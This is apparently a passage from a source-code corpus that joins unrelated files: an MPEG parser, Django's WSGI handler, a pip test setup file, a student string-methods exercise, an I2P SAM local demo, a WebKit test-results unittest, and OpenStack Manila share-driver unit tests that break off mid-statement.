parname=self.parent._name if parname.startswith('audio'): frag = CustomFragment(self, "data", length*8, MpegAudioFile, group=group) elif parname.startswith('video'): frag = CustomFragment(self, "data", length*8, VideoStream, group=group) else: frag = CustomFragment(self, "data", length*8, None, group=group) self.root.streamgroups[tag]=frag.group yield frag class Chunk(FieldSet): ISO_END_CODE = 0xB9 tag_info = { 0xB9: ("end", None, "End"), 0xBA: ("pack_start[]", PackHeader, "Pack start"), 0xBB: ("system_start[]", SystemHeader, "System start"), # streams 0xBD: ("private[]", Stream, "Private elementary"), 0xBE: ("padding[]", Stream, "Padding"), # 0xC0 to 0xFE handled specially 0xFF: ("directory[]", Stream, "Program Stream Directory"), } def __init__(self, *args): FieldSet.__init__(self, *args) if not hasattr(self.root,'streamgroups'): self.root.streamgroups={} for tag in range(0xBC, 0x100): self.root.streamgroups[tag]=None tag = self["tag"].value if tag in self.tag_info: self._name, self.parser, self._description = self.tag_info[tag] elif 0xBC <= tag <= 0xFF: if 0xC0 <= tag < 0xE0: # audio streamid = tag-0xC0 self._name, self.parser, self._description = ("audio[%i][]"%streamid, Stream, "Audio Stream %i Packet"%streamid) elif 0xE0 <= tag < 0xF0: # video streamid = tag-0xE0 self._name, self.parser, self._description = ("video[%i][]"%streamid, Stream, "Video Stream %i Packet"%streamid) else: self._name, self.parser, self._description = ("stream[]", Stream, "Data Stream Packet") else: self.parser = defaultParser if not self.parser: self.parser = defaultParser elif self.parser != PackHeader and "length" in self: self._size = (6 + self["length"].value) * 8 def createFields(self): yield Bytes(self, "sync", 3) yield textHandler(UInt8(self, "tag"), hexadecimal) if self.parser: if self.parser != PackHeader: yield UInt16(self, "length") if not self["length"].value: return yield self.parser(self, "content") def createDescription(self): return "Chunk: tag %s" % self["tag"].display class MPEGVideoFile(Parser): PARSER_TAGS = { "id": "mpeg_video", "category": "video", "file_ext": ("mpeg", "mpg", "mpe", "vob"), "mime": (u"video/mpeg", u"video/mp2p"), "min_size": 12*8, #TODO: "magic": xxx, "description": "MPEG video, version 1 or 2" } endian = BIG_ENDIAN version = None def createFields(self): while self.current_size < self.size: pos=self.stream.searchBytes('\0\0\1',self.current_size,self.current_size+1024*1024*8) # seek forward by at most 1MB if pos is not None: padsize = pos-self.current_size if padsize: yield PaddingBytes(self, "pad[]", padsize//8) chunk=Chunk(self, "chunk[]") try: # force chunk to be processed, so that CustomFragments are complete chunk['content/data'] except: pass yield chunk def validate(self): try: pack = self[0] except FieldError: return "Unable to create first chunk" if pack.name != "pack_start[0]": return "Invalid first chunk" if pack["sync"].value != "\0\0\1": return "Invalid synchronisation" return pack["content"].validate() def getVersion(self): if not self.version: if self["pack_start[0]/content/sync[0]"].size == 2: self.version = 2 else: self.version = 1 return self.version def createDescription(self): if self.getVersion() == 2: return "MPEG-2 video" else: return "MPEG-1 video"
hackerbot/DjangoDev
refs/heads/master
django/core/handlers/wsgi.py
339
from __future__ import unicode_literals import cgi import codecs import logging import sys from io import BytesIO from threading import Lock from django import http from django.conf import settings from django.core import signals from django.core.handlers import base from django.core.urlresolvers import set_script_prefix from django.utils import six from django.utils.encoding import force_str, force_text from django.utils.functional import cached_property logger = logging.getLogger('django.request') # encode() and decode() expect the charset to be a native string. ISO_8859_1, UTF_8 = str('iso-8859-1'), str('utf-8') class LimitedStream(object): ''' LimitedStream wraps another stream in order to not allow reading from it past specified amount of bytes. ''' def __init__(self, stream, limit, buf_size=64 * 1024 * 1024): self.stream = stream self.remaining = limit self.buffer = b'' self.buf_size = buf_size def _read_limited(self, size=None): if size is None or size > self.remaining: size = self.remaining if size == 0: return b'' result = self.stream.read(size) self.remaining -= len(result) return result def read(self, size=None): if size is None: result = self.buffer + self._read_limited() self.buffer = b'' elif size < len(self.buffer): result = self.buffer[:size] self.buffer = self.buffer[size:] else: # size >= len(self.buffer) result = self.buffer + self._read_limited(size - len(self.buffer)) self.buffer = b'' return result def readline(self, size=None): while b'\n' not in self.buffer and \ (size is None or len(self.buffer) < size): if size: # since size is not None here, len(self.buffer) < size chunk = self._read_limited(size - len(self.buffer)) else: chunk = self._read_limited() if not chunk: break self.buffer += chunk sio = BytesIO(self.buffer) if size: line = sio.readline(size) else: line = sio.readline() self.buffer = sio.read() return line class WSGIRequest(http.HttpRequest): def __init__(self, environ): script_name = get_script_name(environ) path_info = get_path_info(environ) if not path_info: # Sometimes PATH_INFO exists, but is empty (e.g. accessing # the SCRIPT_NAME URL without a trailing slash). We really need to # operate as if they'd requested '/'. Not amazingly nice to force # the path like this, but should be harmless. path_info = '/' self.environ = environ self.path_info = path_info # be careful to only replace the first slash in the path because of # http://test/something and http://test//something being different as # stated in http://www.ietf.org/rfc/rfc2396.txt self.path = '%s/%s' % (script_name.rstrip('/'), path_info.replace('/', '', 1)) self.META = environ self.META['PATH_INFO'] = path_info self.META['SCRIPT_NAME'] = script_name self.method = environ['REQUEST_METHOD'].upper() _, content_params = cgi.parse_header(environ.get('CONTENT_TYPE', '')) if 'charset' in content_params: try: codecs.lookup(content_params['charset']) except LookupError: pass else: self.encoding = content_params['charset'] self._post_parse_error = False try: content_length = int(environ.get('CONTENT_LENGTH')) except (ValueError, TypeError): content_length = 0 self._stream = LimitedStream(self.environ['wsgi.input'], content_length) self._read_started = False self.resolver_match = None def _get_scheme(self): return self.environ.get('wsgi.url_scheme') @cached_property def GET(self): # The WSGI spec says 'QUERY_STRING' may be absent. 
raw_query_string = get_bytes_from_wsgi(self.environ, 'QUERY_STRING', '') return http.QueryDict(raw_query_string, encoding=self._encoding) def _get_post(self): if not hasattr(self, '_post'): self._load_post_and_files() return self._post def _set_post(self, post): self._post = post @cached_property def COOKIES(self): raw_cookie = get_str_from_wsgi(self.environ, 'HTTP_COOKIE', '') return http.parse_cookie(raw_cookie) def _get_files(self): if not hasattr(self, '_files'): self._load_post_and_files() return self._files POST = property(_get_post, _set_post) FILES = property(_get_files) class WSGIHandler(base.BaseHandler): initLock = Lock() request_class = WSGIRequest def __call__(self, environ, start_response): # Set up middleware if needed. We couldn't do this earlier, because # settings weren't available. if self._request_middleware is None: with self.initLock: try: # Check that middleware is still uninitialized. if self._request_middleware is None: self.load_middleware() except: # Unload whatever middleware we got self._request_middleware = None raise set_script_prefix(get_script_name(environ)) signals.request_started.send(sender=self.__class__, environ=environ) try: request = self.request_class(environ) except UnicodeDecodeError: logger.warning('Bad Request (UnicodeDecodeError)', exc_info=sys.exc_info(), extra={ 'status_code': 400, } ) response = http.HttpResponseBadRequest() else: response = self.get_response(request) response._handler_class = self.__class__ status = '%s %s' % (response.status_code, response.reason_phrase) response_headers = [(str(k), str(v)) for k, v in response.items()] for c in response.cookies.values(): response_headers.append((str('Set-Cookie'), str(c.output(header='')))) start_response(force_str(status), response_headers) if getattr(response, 'file_to_stream', None) is not None and environ.get('wsgi.file_wrapper'): response = environ['wsgi.file_wrapper'](response.file_to_stream) return response def get_path_info(environ): """ Returns the HTTP request's PATH_INFO as a unicode string. """ path_info = get_bytes_from_wsgi(environ, 'PATH_INFO', '/') return path_info.decode(UTF_8) def get_script_name(environ): """ Returns the equivalent of the HTTP request's SCRIPT_NAME environment variable. If Apache mod_rewrite has been used, returns what would have been the script name prior to any rewriting (so it's the script name as seen from the client's perspective), unless the FORCE_SCRIPT_NAME setting is set (to anything). """ if settings.FORCE_SCRIPT_NAME is not None: return force_text(settings.FORCE_SCRIPT_NAME) # If Apache's mod_rewrite had a whack at the URL, Apache set either # SCRIPT_URL or REDIRECT_URL to the full resource URL before applying any # rewrites. Unfortunately not every Web server (lighttpd!) passes this # information through all the time, so FORCE_SCRIPT_NAME, above, is still # needed. script_url = get_bytes_from_wsgi(environ, 'SCRIPT_URL', '') if not script_url: script_url = get_bytes_from_wsgi(environ, 'REDIRECT_URL', '') if script_url: path_info = get_bytes_from_wsgi(environ, 'PATH_INFO', '') script_name = script_url[:-len(path_info)] if path_info else script_url else: script_name = get_bytes_from_wsgi(environ, 'SCRIPT_NAME', '') return script_name.decode(UTF_8) def get_bytes_from_wsgi(environ, key, default): """ Get a value from the WSGI environ dictionary as bytes. key and default should be str objects. Under Python 2 they may also be unicode objects provided they only contain ASCII characters. 
""" value = environ.get(str(key), str(default)) # Under Python 3, non-ASCII values in the WSGI environ are arbitrarily # decoded with ISO-8859-1. This is wrong for Django websites where UTF-8 # is the default. Re-encode to recover the original bytestring. return value.encode(ISO_8859_1) if six.PY3 else value def get_str_from_wsgi(environ, key, default): """ Get a value from the WSGI environ dictionary as str. key and default should be str objects. Under Python 2 they may also be unicode objects provided they only contain ASCII characters. """ value = get_bytes_from_wsgi(environ, key, default) return value.decode(UTF_8, errors='replace') if six.PY3 else value
Carreau/pip
refs/heads/develop
tests/data/src/compilewheel/setup.py
54
#!/usr/bin/env python
from setuptools import setup, find_packages

setup(name='compilewheel',
      version='1.0',
      packages=find_packages()
      )
NoahFlowa/CTC_Projects
refs/heads/master
Osterhout_Python/Osterhout_OairedActivities.py
1
# Programmer: Noah Osterhout
# Date: October 11th 2016 1:01PM EST
# Project: Osterhout_OairedActivities.py

# Activities 1

steve_jobs = "If today were the last day of my life, would I want to do what I\'m about to do today. And whenever that answer has been 'no' for too many days in a row, I know I need to change something. ~Steve Jobs"
albert_einstein = "I know not with what weapons World War III will be fought, but World War IV will be fought with sticks and stones. ~Albert Einstein"
jfk_quote = "Ask not what your country can do for you, ask what you can do for your country. ~JFK"
bill_gates = "Success is a lousy teacher. It seduces smart people into thinking they can't lose."
steve_woz = "Never trust a computer you can't throw out a window."
elon_musk = "I would like to die on Mars. Just not on impact."

print(steve_jobs)
print(albert_einstein)
print(jfk_quote)
print()
print("----------------------------------------------------------------")
print()
print(steve_jobs.lower())
print(albert_einstein.lower())
print(jfk_quote.lower())
print()
print("----------------------------------------------------------------")
print()
print(steve_jobs.upper())
print(albert_einstein.upper())
print(jfk_quote.upper())
print()
print("----------------------------------------------------------------")
print()
print(steve_jobs.swapcase())
print(albert_einstein.swapcase())
print(jfk_quote.swapcase())
print()
print("----------------------------------------------------------------")
print()
print("""
The .upper() method works to make everything Upper Case.
The .lower() method works to make everything Lower Case.
The .swapcase() method works to make everything SwapCase.
""")
print()
print("Author: Noah Osterhout, PM WGP, CTC")

# Activities 2

print(bill_gates)
print(steve_woz)
print(elon_musk)
print()
print("----------------------------------------------------------------")
print()
print(bill_gates.capitalize())
print(steve_woz.capitalize())
print(elon_musk.capitalize())
print()
print("----------------------------------------------------------------")
print()
print(bill_gates.title())
print(steve_woz.title())
print(elon_musk.title())
print()
print("----------------------------------------------------------------")

what = input("What quote do you want to use for Replace? (1 Bill Gates) (2 Steve Wozniak) (3 Elon Musk) \n")

# input() returns a string, so compare against the digit the user typed
if what == "1":
    print(bill_gates)
    takeOut = input("What word do you want to take out from your Quote? ")  # Asks which word they want replaced in their Quote
    putIn = input("What word do you want to put in the Quote? ")  # Asks for the word they want to put in their Quote
    bill_gates2 = bill_gates.replace(takeOut, putIn)
    print(bill_gates2)
elif what == "2":
    print(steve_woz)
    takeOut = input("What word do you want to take out from your Quote? ")  # Asks which word they want replaced in their Quote
    putIn = input("What word do you want to put in the Quote? ")  # Asks for the word they want to put in their Quote
    steve_woz2 = steve_woz.replace(takeOut, putIn)
    print(steve_woz2)
elif what == "3":
    print(elon_musk)
    takeOut = input("What word do you want to take out from your Quote? ")  # Asks which word they want replaced in their Quote
    putIn = input("What word do you want to put in the Quote? ")  # Asks for the word they want to put in their Quote
    elon_musk2 = elon_musk.replace(takeOut, putIn)
    print(elon_musk2)
else:
    print("ERROR")

print("----------------------------------------------------------------")
print()
print("""
The .capitalize() method capitalizes only the first character of the string.
The .title() method capitalizes the first letter of every word.
The .replace() method swaps one word in the quote for another.
""")
print()
print("Author: Noah Osterhout, PM WGP, CTC")
NoYouShutup/CryptMeme
refs/heads/master
CryptMeme/apps/sam/Demos/rawTests/samIn.py
1
#!/usr/bin/python # create a SAM datagram session that writes incoming messages on its master session stream # and a listen forever # usage : ./samIn.py [session name] import socket import sys if len(sys.argv)==2 : name = sys.argv[1] else : name = "rawSamIn" sess = socket.socket( socket.AF_INET, socket.SOCK_STREAM) sess.connect(("127.0.0.1",7656)); sess.send("HELLO VERSION MIN=3.0 MAX=3.0\n") sys.stdout.write(sess.recv(1000)) sess.send("SESSION CREATE STYLE=RAW ID="+name+" DESTINATION=tYhjbFlFL38WFuO5eCzTvE0UBr4RfaqWMKlekGeMoB-Ouz7nYaWfiS-9j3jMiZT7FH~pwdmoSREOs2ZbXK84sR59P~pPfeCMxnJrk57f3U9uKzXkesjkKWYco3YAGs-G8sw8Fu2FBx0Do57yBdA9~j8Zq6pMjmgPBXCLuXG3vo0Z8zUWCjApJyFY6OXYopHck9Fz9vKy7YhC6zXFHfEuNHVkAooduiLd~aCoGij0TW3lH2rTVU-lx-DUdi6edxQ5-RvDNkXfikvytoCpRkivbNVytjCJLk~7RNU4FpBD20wTZWNJmEG3OY3cjNjawJVFdNjtgczh9K7gZ7ad-NjVjZVhXEj1lU8mk~vAH-2QE5om8dstWUwWoNDwmVDlvIJNKzQmahG~VrpFexFHXO0n3fKIXcSgWGOHDExM8w9neCt7AxUjxPDtXXuYNW~bRwcfiL-C9~z4K9rmwiTPZX0lmsToSXTF28l7WAoj~TMT9kZAjQeFRRWU5oW5oxVuonVvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABngJSS8xMyF4t82otZmCDhrKjbm-QLMtOLoumwR28ebDHEd4clF6O7aRa3d3yRH7p\n") sys.stdout.write(sess.recv(1000)) # listen incoming messages while 1 : chunk = sess.recv(10000) sys.stdout.write(chunk+'\n') if not chunk : break print
PeterWangIntel/blink-crosswalk
refs/heads/master
Tools/Scripts/webkitpy/common/net/layouttestresults_unittest.py
37
# Copyright (c) 2010, Google Inc. All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following disclaimer # in the documentation and/or other materials provided with the # distribution. # * Neither the name of Google Inc. nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. import unittest from webkitpy.common.net.layouttestresults import LayoutTestResults from webkitpy.common.system.outputcapture import OutputCapture from webkitpy.layout_tests.models import test_results from webkitpy.layout_tests.models import test_failures from webkitpy.thirdparty.BeautifulSoup import BeautifulSoup class LayoutTestResultsTest(unittest.TestCase): # The real files have no whitespace, but newlines make this much more readable. 
example_full_results_json = """ADD_RESULTS({ "tests": { "fast": { "dom": { "prototype-inheritance.html": { "expected": "PASS", "actual": "TEXT", "is_unexpected": true }, "prototype-banana.html": { "expected": "FAIL", "actual": "PASS", "is_unexpected": true }, "prototype-taco.html": { "expected": "PASS", "actual": "PASS TEXT", "is_unexpected": true }, "prototype-chocolate.html": { "expected": "FAIL", "actual": "IMAGE+TEXT" }, "prototype-strawberry.html": { "expected": "PASS", "actual": "IMAGE PASS", "is_unexpected": true } } }, "svg": { "dynamic-updates": { "SVGFEDropShadowElement-dom-stdDeviation-attr.html": { "expected": "PASS", "actual": "IMAGE", "has_stderr": true, "is_unexpected": true } } } }, "skipped": 450, "num_regressions": 15, "layout_tests_dir": "\/b\/build\/slave\/Webkit_Mac10_5\/build\/src\/third_party\/WebKit\/LayoutTests", "version": 3, "num_passes": 77, "has_pretty_patch": false, "fixable": 1220, "num_flaky": 0, "blink_revision": "1234", "has_wdiff": false });""" def test_results_from_string(self): self.assertIsNone(LayoutTestResults.results_from_string(None)) self.assertIsNone(LayoutTestResults.results_from_string("")) def test_was_interrupted(self): self.assertTrue(LayoutTestResults.results_from_string('ADD_RESULTS({"tests":{},"interrupted":true});').run_was_interrupted()) self.assertFalse(LayoutTestResults.results_from_string('ADD_RESULTS({"tests":{},"interrupted":false});').run_was_interrupted()) def test_blink_revision(self): self.assertEqual(LayoutTestResults.results_from_string(self.example_full_results_json).blink_revision(), 1234) def test_actual_results(self): results = LayoutTestResults.results_from_string(self.example_full_results_json) self.assertEqual(results.actual_results("fast/dom/prototype-banana.html"), "PASS") self.assertEqual(results.actual_results("fast/dom/prototype-taco.html"), "PASS TEXT") self.assertEqual(results.actual_results("nonexistant.html"), "")
jcsp/manila
refs/heads/master
manila/tests/share/drivers/test_generic.py
2
# Copyright (c) 2014 NetApp, Inc. # Copyright (c) 2015 Mirantis, Inc. # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. """Unit tests for the Generic driver module.""" import os import time import ddt import mock from oslo_concurrency import processutils from oslo_config import cfg from six import moves from manila.common import constants as const from manila import compute from manila import context from manila import exception import manila.share.configuration from manila.share.drivers import generic from manila.share import share_types from manila import test from manila.tests import fake_compute from manila.tests import fake_service_instance from manila.tests import fake_share from manila.tests import fake_utils from manila.tests import fake_volume from manila import utils from manila import volume CONF = cfg.CONF def get_fake_manage_share(): return { 'id': 'fake', 'share_proto': 'NFS', 'share_type_id': 'fake', 'export_locations': [ {'path': '10.0.0.1:/foo/fake/path'}, {'path': '11.0.0.1:/bar/fake/path'}, ], } def get_fake_snap_dict(): snap_dict = { 'status': 'available', 'project_id': '13c0be6290934bd98596cfa004650049', 'user_id': 'a0314a441ca842019b0952224aa39192', 'description': None, 'deleted': '0', 'created_at': '2015-08-10 00:05:58', 'updated_at': '2015-08-10 00:05:58', 'consistency_group_id': '4b04fdc3-00b9-4909-ba1a-06e9b3f88b67', 'cgsnapshot_members': [ { 'status': 'available', 'share_type_id': '1a9ed31e-ee70-483d-93ba-89690e028d7f', 'share_id': 'e14b5174-e534-4f35-bc4f-fe81c1575d6f', 'user_id': 'a0314a441ca842019b0952224aa39192', 'deleted': 'False', 'created_at': '2015-08-10 00:05:58', 'share': { 'id': '03e2f06e-14f2-45a5-9631-0949d1937bd8', 'deleted': False, }, 'updated_at': '2015-08-10 00:05:58', 'share_proto': 'NFS', 'project_id': '13c0be6290934bd98596cfa004650049', 'cgsnapshot_id': 'f6aa3b59-57eb-421e-965c-4e182538e36a', 'deleted_at': None, 'id': '03e2f06e-14f2-45a5-9631-0949d1937bd8', 'size': 1, }, ], 'deleted_at': None, 'id': 'f6aa3b59-57eb-421e-965c-4e182538e36a', 'name': None, } return snap_dict def get_fake_cg_dict(): cg_dict = { 'status': 'creating', 'project_id': '13c0be6290934bd98596cfa004650049', 'user_id': 'a0314a441ca842019b0952224aa39192', 'description': None, 'deleted': 'False', 'created_at': '2015-08-10 00:07:58', 'updated_at': None, 'source_cgsnapshot_id': 'f6aa3b59-57eb-421e-965c-4e182538e36a', 'host': 'openstack2@cmodeSSVMNFS', 'deleted_at': None, 'shares': [ { 'id': '02a32f06e-14f2-45a5-9631-7483f1937bd8', 'deleted': False, 'source_cgsnapshot_member_id': '03e2f06e-14f2-45a5-9631-0949d1937bd8', }, ], 'share_types': [ { 'id': 'f6aa3b56-45a5-9631-02a32f06e1937b', 'deleted': False, 'consistency_group_id': '4b04fdc3-00b9-4909-ba1a-06e9b3f88b67', 'share_type_id': '1a9ed31e-ee70-483d-93ba-89690e028d7f', }, ], 'id': 'eda52174-0442-476d-9694-a58327466c14', 'name': None } return cg_dict def get_fake_collated_cg_snap_info(): fake_collated_cg_snap_info = [ { 'share': { 'id': '02a32f06e-14f2-45a5-9631-7483f1937bd8', 'deleted': False, 
'source_cgsnapshot_member_id': '03e2f06e-14f2-45a5-9631-0949d1937bd8', }, 'snapshot': { 'id': '03e2f06e-14f2-45a5-9631-0949d1937bd8', }, }, ] return fake_collated_cg_snap_info @ddt.ddt class GenericShareDriverTestCase(test.TestCase): """Tests GenericShareDriver.""" def setUp(self): super(GenericShareDriverTestCase, self).setUp() self._context = context.get_admin_context() self._execute = mock.Mock(return_value=('', '')) self._helper_cifs = mock.Mock() self._helper_nfs = mock.Mock() CONF.set_default('driver_handles_share_servers', True) self.fake_conf = manila.share.configuration.Configuration(None) self.fake_private_storage = mock.Mock() self.mock_object(self.fake_private_storage, 'get', mock.Mock(return_value=None)) with mock.patch.object( generic.service_instance, 'ServiceInstanceManager', fake_service_instance.FakeServiceInstanceManager): self._driver = generic.GenericShareDriver( private_storage=self.fake_private_storage, execute=self._execute, configuration=self.fake_conf) self._driver.service_tenant_id = 'service tenant id' self._driver.service_network_id = 'service network id' self._driver.compute_api = fake_compute.API() self._driver.volume_api = fake_volume.API() self._driver.share_networks_locks = {} self._driver.get_service_instance = mock.Mock() self._driver.share_networks_servers = {} self._driver.admin_context = self._context self.fake_sn = {"id": "fake_sn_id"} self.fake_net_info = { "id": "fake_srv_id", "share_network_id": "fake_sn_id" } fsim = fake_service_instance.FakeServiceInstanceManager() sim = mock.Mock(return_value=fsim) self._driver.instance_manager = sim self._driver.service_instance_manager = sim self.fake_server = sim._create_service_instance( context="fake", instance_name="fake", share_network_id=self.fake_sn["id"], old_server_ip="fake") self.mock_object(utils, 'synchronized', mock.Mock(return_value=lambda f: f)) self.mock_object(generic.os.path, 'exists', mock.Mock(return_value=True)) self._driver._helpers = { 'CIFS': self._helper_cifs, 'NFS': self._helper_nfs, } self.share = fake_share.fake_share(share_proto='NFS') self.server = { 'instance_id': 'fake_instance_id', 'ip': 'fake_ip', 'username': 'fake_username', 'password': 'fake_password', 'pk_path': 'fake_pk_path', 'backend_details': { 'ip': '1.2.3.4', 'instance_id': 'fake', 'service_ip': 'fake_ip', }, 'availability_zone': 'fake_az', } self.access = fake_share.fake_access() self.snapshot = fake_share.fake_snapshot() self.mock_object(time, 'sleep') self.mock_debug_log = self.mock_object(generic.LOG, 'debug') self.mock_warning_log = self.mock_object(generic.LOG, 'warning') self.mock_error_log = self.mock_object(generic.LOG, 'error') self.mock_exception_log = self.mock_object(generic.LOG, 'exception') def test_do_setup(self): self.mock_object(volume, 'API') self.mock_object(compute, 'API') self.mock_object(self._driver, '_setup_helpers') self._driver.do_setup(self._context) volume.API.assert_called_once_with() compute.API.assert_called_once_with() self._driver._setup_helpers.assert_called_once_with() def test_setup_helpers(self): self._driver._helpers = {} CONF.set_default('share_helpers', ['NFS=fakenfs']) self.mock_object(generic.importutils, 'import_class', mock.Mock(return_value=self._helper_nfs)) self._driver._setup_helpers() generic.importutils.import_class.assert_has_calls([ mock.call('fakenfs') ]) self._helper_nfs.assert_called_once_with( self._execute, self._driver._ssh_exec, self.fake_conf ) self.assertEqual(len(self._driver._helpers), 1) def test_setup_helpers_no_helpers(self): self._driver._helpers = 
{} CONF.set_default('share_helpers', []) self.assertRaises(exception.ManilaException, self._driver._setup_helpers) def test__get_access_rule_for_data_copy_dhss_true(self): get_access_return = { 'access_level': 'rw', 'access_to': 'fake_ip', 'access_type': 'ip' } result = self._driver._get_access_rule_for_data_copy( self._context, self.share, self.server) self.assertEqual(get_access_return, result) def test__get_access_rule_for_data_copy_dhss_false(self): get_access_return = { 'access_level': 'rw', 'access_to': 'fake_ip', 'access_type': 'ip' } CONF.set_default('driver_handles_share_servers', False) CONF.set_default('migration_data_copy_node_ip', 'fake_ip') result = self._driver._get_access_rule_for_data_copy( self._context, self.share, self.server) self.assertEqual(get_access_return, result) def test_create_share(self): volume = 'fake_volume' volume2 = 'fake_volume2' self._helper_nfs.create_export.return_value = 'fakelocation' self.mock_object(self._driver, '_allocate_container', mock.Mock(return_value=volume)) self.mock_object(self._driver, '_attach_volume', mock.Mock(return_value=volume2)) self.mock_object(self._driver, '_format_device') self.mock_object(self._driver, '_mount_device') result = self._driver.create_share( self._context, self.share, share_server=self.server) self.assertEqual(result, 'fakelocation') self._driver._allocate_container.assert_called_once_with( self._driver.admin_context, self.share) self._driver._attach_volume.assert_called_once_with( self._driver.admin_context, self.share, self.server['backend_details']['instance_id'], volume) self._driver._format_device.assert_called_once_with( self.server['backend_details'], volume2) self._driver._mount_device.assert_called_once_with( self.share, self.server['backend_details'], volume2) def test_create_share_exception(self): share = fake_share.fake_share(share_network_id=None) self.assertRaises(exception.ManilaException, self._driver.create_share, self._context, share) def test_create_share_invalid_helper(self): self._driver._helpers = {'CIFS': self._helper_cifs} self.assertRaises(exception.InvalidShare, self._driver.create_share, self._context, self.share, share_server=self.server) def test_format_device(self): volume = {'mountpoint': 'fake_mount_point'} self.mock_object(self._driver, '_ssh_exec', mock.Mock(return_value=('', ''))) self._driver._format_device(self.server, volume) self._driver._ssh_exec.assert_called_once_with( self.server, ['sudo', 'mkfs.%s' % self.fake_conf.share_volume_fstype, volume['mountpoint']]) def test_mount_device_not_present(self): server = {'instance_id': 'fake_server_id'} mount_path = self._driver._get_mount_path(self.share) volume = {'mountpoint': 'fake_mount_point'} self.mock_object(self._driver, '_is_device_mounted', mock.Mock(return_value=False)) self.mock_object(self._driver, '_sync_mount_temp_and_perm_files') self.mock_object(self._driver, '_ssh_exec', mock.Mock(return_value=('', ''))) self._driver._mount_device(self.share, server, volume) self._driver._is_device_mounted.assert_called_once_with( mount_path, server, volume) self._driver._sync_mount_temp_and_perm_files.assert_called_once_with( server) self._driver._ssh_exec.assert_called_once_with( server, ['sudo mkdir -p', mount_path, '&&', 'sudo mount', volume['mountpoint'], mount_path, '&& sudo chmod 777', mount_path], ) def test_mount_device_present(self): mount_path = '/fake/mount/path' volume = {'mountpoint': 'fake_mount_point'} self.mock_object(self._driver, '_is_device_mounted', mock.Mock(return_value=True)) 
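        # The device is reported as already mounted, so _mount_device is
        # expected to skip the mount command and only log a warning; that
        # warning is asserted at the end of this test.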
self.mock_object(self._driver, '_get_mount_path', mock.Mock(return_value=mount_path)) self.mock_object(generic.LOG, 'warning') self._driver._mount_device(self.share, self.server, volume) self._driver._get_mount_path.assert_called_once_with(self.share) self._driver._is_device_mounted.assert_called_once_with( mount_path, self.server, volume) generic.LOG.warning.assert_called_once_with(mock.ANY, mock.ANY) def test_mount_device_exception_raised(self): volume = {'mountpoint': 'fake_mount_point'} self.mock_object( self._driver, '_is_device_mounted', mock.Mock(side_effect=exception.ProcessExecutionError)) self.assertRaises( exception.ShareBackendException, self._driver._mount_device, self.share, self.server, volume, ) self._driver._is_device_mounted.assert_called_once_with( self._driver._get_mount_path(self.share), self.server, volume) def test_unmount_device_present(self): mount_path = '/fake/mount/path' self.mock_object(self._driver, '_is_device_mounted', mock.Mock(return_value=True)) self.mock_object(self._driver, '_sync_mount_temp_and_perm_files') self.mock_object(self._driver, '_get_mount_path', mock.Mock(return_value=mount_path)) self.mock_object(self._driver, '_ssh_exec', mock.Mock(return_value=('', ''))) self._driver._unmount_device(self.share, self.server) self._driver._get_mount_path.assert_called_once_with(self.share) self._driver._is_device_mounted.assert_called_once_with( mount_path, self.server) self._driver._sync_mount_temp_and_perm_files.assert_called_once_with( self.server) self._driver._ssh_exec.assert_called_once_with( self.server, ['sudo umount', mount_path, '&& sudo rmdir', mount_path], ) def test_unmount_device_retry_once(self): self.counter = 0 def _side_effect(*args): self.counter += 1 if self.counter < 2: raise exception.ProcessExecutionError mount_path = '/fake/mount/path' self.mock_object(self._driver, '_is_device_mounted', mock.Mock(return_value=True)) self.mock_object(self._driver, '_sync_mount_temp_and_perm_files') self.mock_object(self._driver, '_get_mount_path', mock.Mock(return_value=mount_path)) self.mock_object(self._driver, '_ssh_exec', mock.Mock(side_effect=_side_effect)) self._driver._unmount_device(self.share, self.server) self.assertEqual(1, time.sleep.call_count) self.assertEqual(self._driver._get_mount_path.mock_calls, [mock.call(self.share) for i in moves.range(2)]) self.assertEqual(self._driver._is_device_mounted.mock_calls, [mock.call(mount_path, self.server) for i in moves.range(2)]) self._driver._sync_mount_temp_and_perm_files.assert_called_once_with( self.server) self.assertEqual( self._driver._ssh_exec.mock_calls, [mock.call(self.server, ['sudo umount', mount_path, '&& sudo rmdir', mount_path]) for i in moves.range(2)] ) def test_unmount_device_not_present(self): mount_path = '/fake/mount/path' self.mock_object(self._driver, '_is_device_mounted', mock.Mock(return_value=False)) self.mock_object(self._driver, '_get_mount_path', 